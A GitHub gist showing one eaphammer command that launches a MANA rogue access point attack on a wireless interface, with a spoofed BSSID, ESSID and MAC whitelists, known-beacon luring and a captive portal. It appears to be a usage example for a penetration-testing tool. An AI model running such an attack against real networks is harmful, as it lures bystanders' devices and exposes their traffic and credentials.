Created
November 4, 2019 06:19
-
-
Save s0lst1c3/165185bbe07a1d7f8c89aaf4ea7fd67b to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# execute a mana attack but only respond to ESSIDs in whitelist | |
./eaphammer -i wlan0 \ | |
--bssid de:ad:be:ef:13:37 \ | |
--mana \ | |
-e bananas \ | |
--ssid-whitelist ssid-whitelist.txt \ | |
--mac-whitelist mac-whitelist.txt \ | |
--known-beacons \ | |
--captive-portal |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment